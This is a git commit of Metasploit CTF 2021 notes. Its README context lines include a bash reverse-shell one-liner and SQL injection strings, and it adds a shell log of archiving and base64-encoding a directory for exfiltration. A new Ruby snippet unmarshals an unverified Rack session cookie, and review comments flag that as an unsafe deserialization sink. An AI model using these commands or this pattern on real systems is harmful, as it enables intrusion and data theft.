author    Malfurious <m@lfurio.us>  2022-02-26 07:03:33 -0500
committer Malfurious <m@lfurio.us>  2022-02-26 07:03:33 -0500
commit    ee86bce695ef07c2356746385e1fc73f87a837d0 (patch)
tree      2ecb446e788009487aa790e437b4f30eee6b00df
parent    7bf3df5ca773cb6141afcec2fe1c830c0cbed4a6 (diff)
Commit notes from Metasploit CTF 2021
Signed-off-by: Malfurious <m@lfurio.us>
-rw-r--r--  README.txt                             | 24 +
-rw-r--r--  docs/lang/ruby/rack_session_cookie.rb  | 12 +
2 files changed, 36 insertions, 0 deletions
diff --git a/README.txt b/README.txt
index c337ce7..b810726 100644
--- a/README.txt
+++ b/README.txt
@@ -20,3 +20,27 @@ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
' OR 1=1-- # SQL inject (pass)
' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
+
+
+
+**How not to exfil a directory**
+ $ zip challenge/
+ $ gzip challenge
+ $ ls
+ $ ls challenge
+ $ rm challenge.gz
+ $ man gzip
+ $ exit
+**Log Back In**
+ $ gzip -k challenge
+ $ ls
+ $ base64 challenge.gz
+ $ exit
+**Log Back In**
+ $ rm challenge.gz
+ $ tar -czf challenge
+ $ ls
+ $ tar -czf challenge.tar.gz challenge
+ $ ls
+ $ base64 challenge.tar.gz
+ $ exit
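Review bot: the transcript records the dead ends but not why each one failed, so the lesson is lost on anyone reading the README later; annotate each failed line with the same `# ...` trailing-comment style the rest of the file uses. Concretely, `zip challenge/` passes the directory as the archive name with no files to add, `gzip` compresses single files and ignores a directory, so both `gzip challenge` and `gzip -k challenge` produce nothing, and `tar -czf challenge` names `challenge` as the output archive while listing no inputs; only the last pair, `tar -czf challenge.tar.gz challenge` followed by `base64 challenge.tar.gz`, yields a blob that survives a copy-paste out of the session. The `**...**` emphasis on the two headings is also markdown that this plain-text README does not use elsewhere.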
diff --git a/docs/lang/ruby/rack_session_cookie.rb b/docs/lang/ruby/rack_session_cookie.rb
new file mode 100644
index 0000000..5b0a62a
--- /dev/null
+++ b/docs/lang/ruby/rack_session_cookie.rb
@@ -0,0 +1,12 @@
+require 'base64'
+require 'cgi'
+
+# 'SessionId' class possibly not provided by import.
+# A dummy definition is needed for the Marshal.load()
+#require 'rack'
+class Rack::Session::SessionId
+end
+
+cookie = "....."
+
+obj = Marshal.load(Base64.decode64(CGI.unescape(cookie.split("\n").join).split('--').first))
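Review bot: the stub at `class Rack::Session::SessionId` raises `NameError: uninitialized constant Rack` when run as written, because with `require 'rack'` commented out the enclosing `Rack` and `Rack::Session` constants do not exist, and Ruby's nested `class A::B::C` syntax needs them already defined; open them explicitly (`module Rack; module Session; class SessionId; end; end; end`) so the script actually runs without the gem, which is what the comment above it intends. Two points worth a comment next to the `Marshal.load` line: `.split('--').first` throws away the HMAC that Rack appends after the payload, so nothing here verifies the cookie before deserializing it, and `Marshal.load` instantiates whatever classes the payload names, which makes it a deserialization sink that is only safe on a cookie whose origin is known (a session cookie issued to the tester, not arbitrary input). The `cookie = "....."` placeholder should also say what goes there, namely the raw value of the `rack.session` cookie as copied from the browser.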